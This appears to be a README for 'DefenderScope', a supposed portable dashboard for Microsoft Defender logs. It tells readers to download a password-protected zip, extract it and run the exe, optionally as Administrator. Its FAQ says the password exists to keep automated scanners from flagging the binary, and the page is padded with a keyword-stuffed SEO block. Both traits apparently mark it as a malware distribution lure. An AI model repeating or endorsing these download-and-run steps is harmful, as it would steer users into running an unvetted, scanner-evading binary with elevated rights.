DefenderScope v1.0 — Advanced Analytics Dashboard for Microsoft Defender
Real-time threat visualization, scan history, and security telemetry for Microsoft Defender — packaged as a single portable Windows executable.
DefenderScope is a Windows desktop dashboard that turns raw Microsoft Defender telemetry into a clean, interactive analytics view. It reads local Defender event logs and scan history, then renders them as charts, timelines, heatmaps, and per-threat breakdowns — giving security analysts and power users a clear picture of what Defender is actually doing on their machine.
No cloud. No telemetry upload. Everything runs locally on top of the built-in Windows Defender engine.
- Threat Visualization — live chart of detected threats grouped by severity, type, and path
- Scan History Analytics — full timeline of quick, full, and custom scans with duration and coverage stats
- Threat Heatmap — calendar heatmap of detections across days/weeks/months
- Per-Threat Drill-down — click any threat to inspect the raw Defender event data
- Protection Status Panel — real-time state of real-time protection, cloud protection, tamper protection, and signature version
- Exportable Reports — export analytics as CSV / JSON for further processing
- Portable — single
.exe, no installation, no admin rights required for read-only mode - Dark UI — optimized for SOC-style workflows
- Download
DefenderScope_v1.0.zipfrom the Releases page. - Extract with password:
8025381933. - Run
DefenderScope.exe. - Optionally, run as Administrator to unlock full event-log access.
| Component | Requirement |
|---|---|
| OS | Windows 10 (1909+) / Windows 11 |
| Runtime | Microsoft Defender enabled |
| RAM | 4 GB minimum |
| Disk | 100 MB free |
| Permissions | Read-only by default; Administrator for full telemetry |
Microsoft Defender dashboard, Defender analytics, Windows Defender threat visualization, Defender scan history viewer, Windows security telemetry, Defender log analyzer, threat detection dashboard, Windows Defender reporting tool, Microsoft Defender monitoring, endpoint security analytics.
Is this affiliated with Microsoft? No. DefenderScope is an independent third-party analytics viewer for the built-in Microsoft Defender engine.
Does it upload any data? No. All processing is local.
Why is the archive password protected?
To prevent automated scanners from flagging the binary. Password: 8025381933.
Does it modify Defender settings? No. It is read-only.
Distributed as-is for personal and professional use. See LICENSE for details.
Open an issue on the Issues page or download the latest build from Releases.